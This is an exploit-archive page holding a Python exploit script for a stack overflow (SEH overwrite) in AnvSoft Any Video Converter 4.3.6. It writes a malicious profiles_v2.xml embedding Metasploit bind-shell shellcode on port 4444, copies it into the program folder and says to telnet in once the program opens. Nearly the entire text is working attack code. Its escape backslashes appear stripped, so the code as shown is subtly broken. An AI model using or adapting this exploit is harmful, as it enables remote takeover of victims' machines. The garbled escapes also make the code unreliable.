AnvSoft Any Video Converter 4.3.6 Stack Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : AnvSoft Any Video Converter 4.3.6 Stack Overflow Exploit
# Published : 2012-05-03
# Author :
# Previous Title : SAMSUNG NET-i Viewer 1.37 SEH Overwrite
# Next Title : Mini-stream RM-MP3 Converter v3.1.2.2 Local Buffer Overflow
#!/usr/bin/python
#
# Exploit Title: AnvSoft Any Video Converter 4.3.6 Stack Overflow
# Author: cikumel (@mhx_x) and y0k (@riy0_wid) from @spentera research
# Website: http://www.spentera.com
# Platform: Windows
# Tested on: Windows XP SP3
# Based on POC by Vulnerability-Lab (http://www.exploit-db.com/exploits/18717/)
# 

import os,shutil,time,sys

def banner():
    print "ntAnvSoft Any Video Converter 4.3.6 Stack Overflow"
    print "tbased on POC by Vulnerability-Lab (www.vulnerability-lab.com)"
    print "tcikumel (@mhx_x) and y0k (@riy0_wid) from @spentera researchn"
    print "t----------------------------------------------------n"

junk = "x90" * 328
nseh = "xebx06x90x90"
seh  = "xe4xf3x04x10"

# win32_bind -  EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
# badchars = "x00x0ax0dx22x26x3e"
code = ("xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x51x48x5ax6ax48"
"x58x30x41x30x50x42x6bx42x41x58x41x42x32x42x41x32"
"x41x41x30x41x41x58x50x38x42x42x75x59x79x69x6cx30"
"x6ax78x6bx32x6dx78x68x4bx49x4bx4fx4bx4fx4bx4fx41"
"x70x6cx4bx30x6cx51x34x66x44x6ex6bx72x65x35x6cx6c"
"x4bx73x4cx67x75x30x78x67x71x68x6fx4cx4bx50x4fx47"
"x68x4ex6bx41x4fx67x50x55x51x7ax4bx42x69x6cx4bx74"
"x74x4cx4bx36x61x78x6ex74x71x4bx70x4fx69x6ex4cx4f"
"x74x4bx70x70x74x65x57x4ax61x6bx7ax56x6dx47x71x4b"
"x72x5ax4bx58x74x35x6bx72x74x75x74x34x68x30x75x4b"
"x55x4cx4bx43x6fx57x54x36x61x68x6bx72x46x4ex6bx56"
"x6cx30x4bx6ex6bx43x6fx65x4cx67x71x4ax4bx44x43x54"
"x6cx4cx4bx6fx79x70x6cx74x64x35x4cx70x61x39x53x57"
"x41x69x4bx50x64x6cx4bx47x33x70x30x6cx4bx57x30x76"
"x6cx6cx4bx72x50x45x4cx6ex4dx4cx4bx53x70x43x38x63"
"x6ex55x38x6cx4ex30x4ex54x4ex78x6cx42x70x69x6fx6e"
"x36x53x56x63x63x70x66x33x58x54x73x36x52x53x58x61"
"x67x34x33x57x42x41x4fx53x64x39x6fx5ax70x45x38x68"
"x4bx7ax4dx39x6cx57x4bx66x30x6bx4fx49x46x63x6fx4b"
"x39x79x75x65x36x4fx71x58x6dx47x78x63x32x70x55x73"
"x5ax37x72x4bx4fx68x50x70x68x4ex39x74x49x4cx35x4c"
"x6dx71x47x4bx4fx4ax76x32x73x63x63x50x53x50x53x31"
"x43x52x63x73x63x47x33x33x63x59x6fx4ex30x31x76x30"
"x68x77x61x51x4cx31x76x51x43x4dx59x6ax41x6fx65x45"
"x38x4fx54x66x7ax50x70x6ax67x66x37x79x6fx6ex36x61"
"x7ax64x50x33x61x42x75x69x6fx6ax70x33x58x4cx64x6e"
"x4dx56x4ex39x79x73x67x4bx4fx7ax76x72x73x70x55x59"
"x6fx58x50x61x78x6ax45x41x59x6dx56x42x69x66x37x4b"
"x4fx4ex36x46x30x76x34x31x44x50x55x69x6fx4ex30x6e"
"x73x75x38x6bx57x64x39x49x56x43x49x46x37x39x6fx4b"
"x66x66x35x39x6fx68x50x75x36x62x4ax43x54x72x46x65"
"x38x65x33x70x6dx4fx79x6bx55x32x4ax46x30x46x39x41"
"x39x38x4cx4dx59x4dx37x41x7ax52x64x4fx79x6bx52x70"
"x31x4bx70x4cx33x4fx5ax49x6ex77x32x76x4dx69x6ex31"
"x52x64x6cx4ex73x4ex6dx43x4ax34x78x6ex4bx6ex4bx6c"
"x6bx50x68x62x52x4bx4ex78x33x54x56x4bx4fx73x45x32"
"x64x39x6fx38x56x61x4bx32x77x43x62x70x51x73x61x71"
"x41x63x5ax44x41x31x41x43x61x63x65x56x31x6bx4fx4e"
"x30x53x58x4cx6dx5ax79x54x45x58x4ex33x63x4bx4fx6b"
"x66x50x6ax39x6fx4bx4fx70x37x4bx4fx38x50x4ex6bx62"
"x77x49x6cx4cx43x49x54x43x54x69x6fx5ax76x56x32x79"
"x6fx6ex30x50x68x53x4ex6ax78x7ax42x44x33x52x73x39"
"x6fx4ex36x79x6fx68x50x48")

sisa = "x90" * (1000-len(code)) 

poc = "<root>n"
poc+= "<categories>n"
poc+= "<category name=""+junk+nseh+seh+code+sisa+"" id="0" icon="cat_all.bmp" desc="All Profiles"/>n"
poc+= "</categories>n"
poc+= "<groups></groups>n<profiles></profiles>n</root>n"

file = "profiles_v2.xml"
splash=os.path.abspath(file)
profdir="C:Program FilesAnvSoftAny Video Converter Professional"

writeFile = open(file, "w")
if os.name == 'nt':
	if os.path.isdir(profdir):
		try:
			writeFile.write(poc)
			banner()
			print "[*] Creating the malicious",file
			time.sleep(1)
			print "[*] Malicious",file,"created.."
			writeFile.close()
			shutil.copy2(splash,profdir)
			print "[*] File",file,"has been copied to",profdir
			print "[*] Now open AnvSoft program and telnet to port 4444"
		except IOError:
			print "[-] Could not write to destination folder, check permission.."
			sys.exit()
	else:
		print "[-] Could not find installation directory, is AnvSoft Any Video Converter installed?"
		sys.exit()
else:
	print "[-] Please run this script on Windows."
	sys.exit()